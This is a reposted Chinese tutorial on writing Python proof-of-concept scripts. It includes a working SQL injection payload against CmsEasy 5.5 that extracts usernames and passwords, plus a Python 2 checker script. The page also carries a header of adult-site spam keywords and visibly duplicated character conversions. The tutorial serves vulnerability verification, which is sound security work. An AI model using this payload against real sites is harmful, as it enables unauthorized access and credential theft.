日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
創(chuàng)新互聯(lián)Python教程:python poc是什么

如今,PoC 的編寫在我們安全研究團(tuán)隊是每個人必備的技能之一。那么,PoC是什么呢?我們應(yīng)該如何優(yōu)雅的來進(jìn)行編寫?

成都一家集口碑和實力的網(wǎng)站建設(shè)服務(wù)商,擁有專業(yè)的企業(yè)建站團(tuán)隊和靠譜的建站技術(shù),十余年企業(yè)及個人網(wǎng)站建設(shè)經(jīng)驗 ,為成都超過千家客戶提供網(wǎng)頁設(shè)計制作,網(wǎng)站開發(fā),企業(yè)網(wǎng)站制作建設(shè)等服務(wù),包括成都營銷型網(wǎng)站建設(shè),高端網(wǎng)站設(shè)計,同時也為不同行業(yè)的客戶提供成都網(wǎng)站設(shè)計、成都做網(wǎng)站的服務(wù),包括成都電商型網(wǎng)站制作建設(shè),裝修行業(yè)網(wǎng)站制作建設(shè),傳統(tǒng)機械行業(yè)網(wǎng)站建設(shè),傳統(tǒng)農(nóng)業(yè)行業(yè)網(wǎng)站制作建設(shè)。在成都做網(wǎng)站,選網(wǎng)站制作建設(shè)服務(wù)商就選創(chuàng)新互聯(lián)公司。

0x00 我們需要掌握的幾個的概念

PoC(全稱:Proof of Concept)中文意思是“觀點證明”。在安全行業(yè)中PoC則是一段驗證漏洞的程序,使我們能夠確認(rèn)這個漏洞是真實存在的。

python,是一種面向?qū)ο?、解釋型計算機程序設(shè)計語言。常見的一些庫我們需要了解,比如:urllib,urllib2,re,request,socket等,本文我們要使用Python這門語言,Python的基礎(chǔ)知識我們不做講解。

SQL Injection,通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。

0x01 PoC編寫流程

場景還原:某網(wǎng)站托管公司,旗下托管了數(shù)萬個站點,負(fù)責(zé)這些站點的安全,但是突然某一天,某知名CMS程序被爆出存在一個高危的SQL注入,某網(wǎng)管排查后發(fā)現(xiàn)旗下托管網(wǎng)站中存在幾百個站點使用該CMS程序,那么一個一個去排查是否存在該漏洞是非常繁瑣的,所以,我們需要一個PoC來驗證下。

·根據(jù)該漏洞詳情的描述,假設(shè)已知出現(xiàn)漏洞的CMS版本號為4.1,可以去其官網(wǎng)或者GitHub上去下載相對應(yīng)的版本。

·下載之后,模擬其服務(wù)器真實環(huán)境,本地進(jìn)行搭建。根據(jù)漏洞描述,進(jìn)行復(fù)現(xiàn),已SQL注入為例,重復(fù)提交不同的參數(shù),觀察不同的返回結(jié)果,同時注意如果該漏洞不存在出現(xiàn)的結(jié)果。

·根據(jù)漏洞復(fù)現(xiàn)的實際情況,進(jìn)行PoC的編寫。

·PoC寫完之后需要進(jìn)行相關(guān)的測試,已確保該PoC的編寫沒有問題,比如測試靶機程序,以及不存在漏洞的程序。

0x02 SQL Injection poc編寫

已知CmsEasy 5.5 UTF-8程序存在SQL注入,烏云漏洞中的漏洞細(xì)節(jié)比較詳細(xì)

(由于wooyun已經(jīng)暫停訪問,故不上鏈接了)。

·首先,我們需要下載其相關(guān)源碼,進(jìn)行本地搭建。

閱讀漏洞細(xì)節(jié),我們得知其url與payload如下:

URL:http://xxx.xxx/celive/live/header.php Payload:xajax=LiveMessage&xajaxargs[0]=name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20

·漏洞復(fù)現(xiàn):我們根據(jù)其漏洞描述,進(jìn)行復(fù)現(xiàn),該注入點需要發(fā)起一個Post請求,我們使用Firefox瀏覽器配合hackbar插件進(jìn)行復(fù)現(xiàn),填入url與payload,發(fā)送,獲取其賬戶密碼。

漏洞效果如下:

這樣,我們的漏洞就已經(jīng)復(fù)現(xiàn)成功了。接下來,我們來寫Poc。

#!/usr/bin/env python
# coding:utf-8
import urllib2
import urllib
import re
import sys
def verify(url):
target = '%s/celive/live/header.php' % url
#需要發(fā)送的數(shù)據(jù)
post_data = {
'xajax': 'LiveMessage',
'xajaxargs[0]': "name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- " }
try:
#發(fā)送請求
req = urllib2.Request(target, data=urllib.urlencode(post_data))
response = urllib2.urlopen(req)
#處理請求,進(jìn)行判斷
if response:
data = response.read()
if "XPATH syntax error" in data:
print "%s is vulnerable" % target
else:
print "%s is not vulnerable" % target

except Exception, e:
print "Something happend..."
print e
def main():
args = sys.argv
url = ""
if len(args) == 2:
url = args[1]
verify(url)
else:
print "Usage: python %s url" % (args[0])
if __name__ == '__main__':
main()

網(wǎng)頁標(biāo)題:創(chuàng)新互聯(lián)Python教程:python poc是什么
轉(zhuǎn)載注明:http://www.dlmjj.cn/article/dhcepih.html